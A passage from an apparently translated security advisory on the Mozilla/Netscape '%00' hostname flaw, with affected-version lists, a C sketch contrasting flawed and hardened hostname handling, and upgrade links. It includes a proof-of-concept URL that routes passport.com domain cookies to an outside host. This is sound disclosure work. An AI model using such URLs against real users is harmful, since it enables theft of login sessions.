   - Apple MacOS 9.0.4
   - Apple MacOS 9.1
   - Apple MacOS 9.2
   - Apple MacOS 9.2.1
   - Apple MacOS X 10.0
   - Apple MacOS X 10.0.1
   - Apple MacOS X 10.0.2
   - Apple MacOS X 10.0.3
   - Apple MacOS X 10.0.4
   - Apple MacOS X 10.1
   - Apple MacOS X 10.1.1
   - Apple MacOS X 10.1.2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - Microsoft Windows XP
Netscape Netscape 6.2.1
   - Apple MacOS 9.0
   - Apple MacOS 9.0.4
   - Apple MacOS 9.1
   - Apple MacOS 9.2
   - Apple MacOS 9.2.1
   - Apple MacOS X 10.0
   - Apple MacOS X 10.0.1
   - Apple MacOS X 10.0.2
   - Apple MacOS X 10.0.3
   - Apple MacOS X 10.0.4
   - Apple MacOS X 10.1
   - Apple MacOS X 10.1.1
   - Apple MacOS X 10.1.2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6a
   - Microsoft Windows XP
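Detailed description
Mozilla is a free, open-source web browser that runs on UNIX systems. Netscape is
also a fairly popular web browser and can likewise be used on a variety of platforms.

Mozilla and Netscape contain a vulnerability that lets an attacker use a user's
vulnerable browser to steal the user's local cookie-based authentication information.

The problem lies in how the browser handles the "%00" NULL character. Take the
following URL:
http://alive.znep.com%00www.passport.com/cgi-bin/cookies
This link causes Mozilla and Netscape to connect to the hostname that precedes the
"%00" character, but the cookies sent to the server are chosen based on the entire
hostname, so the cookies associated with www.passport.com are disclosed. The
vulnerability also affects URL requests that use SSL. However, cookies set for a
specific hostname (e.g. "www.passport.com") cannot be stolen this way; only cookies
set for the whole domain (e.g. ".passport.com") can be stolen.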
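
The following C sketch is an added illustration, not Mozilla or Netscape source code. It models the mismatch described above: the connection target is read as a C string that stops at the first NUL, while the cookie scope check runs over the full decoded length. A hardened variant rejects the hostname before either use. The function names and the simplified cookie-scope rule are assumptions made for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define HOST_MAX 256

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Percent-decode src into dst. Returns the decoded length (which may span
   embedded 0x00 bytes) or -1 on malformed input or overflow. */
static int pct_decode(const char *src, char *dst, size_t cap) {
    size_t n = 0;
    while (*src) {
        int c = (unsigned char)*src++;
        if (c == '%') {
            int hi = hexval((unsigned char)src[0]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)src[1]);
            if (lo < 0) return -1;
            c = hi * 16 + lo;
            src += 2;
        }
        if (n + 1 >= cap) return -1;
        dst[n++] = (char)c;
    }
    dst[n] = '\0';
    return (int)n;
}

/* Simplified cookie scope rule (assumption): a ".domain" cookie tail-matches
   the host, a host-only cookie needs an exact match. Works on an explicit
   length, so bytes after an embedded NUL are still compared. */
static int cookie_applies(const char *host, size_t hlen, const char *scope) {
    size_t slen = strlen(scope);
    if (scope[0] == '.')
        return hlen >= slen && memcmp(host + hlen - slen, scope, slen) == 0;
    return hlen == slen && memcmp(host, scope, slen) == 0;
}

/* Flawed model: two different views of the same decoded hostname.
   Returns 1 if the cookie is attached, 0 if not, -1 on decode error. */
int flawed_request(const char *enc_host, const char *scope,
                   char *connect_host, size_t cap) {
    char host[HOST_MAX];
    int n = pct_decode(enc_host, host, sizeof host);
    if (n < 0) return -1;
    snprintf(connect_host, cap, "%s", host);        /* stops at first NUL */
    return cookie_applies(host, (size_t)n, scope);  /* uses the whole name */
}

/* Hardened model: validate once, then use one string for both decisions.
   Returns -1 (request refused) for any byte outside [A-Za-z0-9.-]. */
int hardened_request(const char *enc_host, const char *scope,
                     char *connect_host, size_t cap) {
    char host[HOST_MAX];
    int n = pct_decode(enc_host, host, sizeof host);
    if (n <= 0) return -1;
    for (int i = 0; i < n; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!isalnum(c) && c != '.' && c != '-') return -1; /* covers 0x00 */
    }
    snprintf(connect_host, cap, "%s", host);
    return cookie_applies(host, (size_t)n, scope);
}

int main(void) {
    /* Hostname taken from the URL quoted in the advisory. */
    const char *h = "alive.znep.com%00www.passport.com";
    char target[HOST_MAX];
    int sent = flawed_request(h, ".passport.com", target, sizeof target);
    printf("flawed:   connect=%s domain-cookie-sent=%d\n", target, sent);
    sent = flawed_request(h, "www.passport.com", target, sizeof target);
    printf("flawed:   connect=%s host-cookie-sent=%d\n", target, sent);
    printf("hardened: result=%d\n",
           hardened_request(h, ".passport.com", target, sizeof target));
    return 0;
}
```
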

Test code
See the description.

Solution
Upgrade as follows:

Mozilla Browser 0.9.2.1:

Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/

Mozilla Browser 0.9.2:

Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/

Mozilla Browser 0.9.3:

Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/

Mozilla Browser 0.9.4.1:

Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/

Mozilla Browser 0.9.4:

Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/

Mozilla Browser 0.9.5:

Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/

Mozilla Browser 0.9.6:

Mozilla Upgrade Mozilla 0.9.7
http://www.mozilla.org/releases/

Netscape Communicator 4.08:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.07:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.06:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.05:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.04:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.0:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.5BETA:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.5:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.6:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.7:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.51:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.61:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.72:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.73:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.74:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.75:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.76:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Netscape 4.77 Mac:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.77:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Communicator 4.78:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Netscape 6.0 Mac:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Netscape 6.1:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Netscape Netscape 6.2:

Netscape Upgrade Netscape 6.2.1
http://home.netscape.com/download/index.html

Related information
Marc Slemko <marcs@znep.com>.
Reference: http://www.securityfocus.com/archive/1/251788
Related home pages: http://www.mozilla.org/
http://home.netscape.com/download/index.html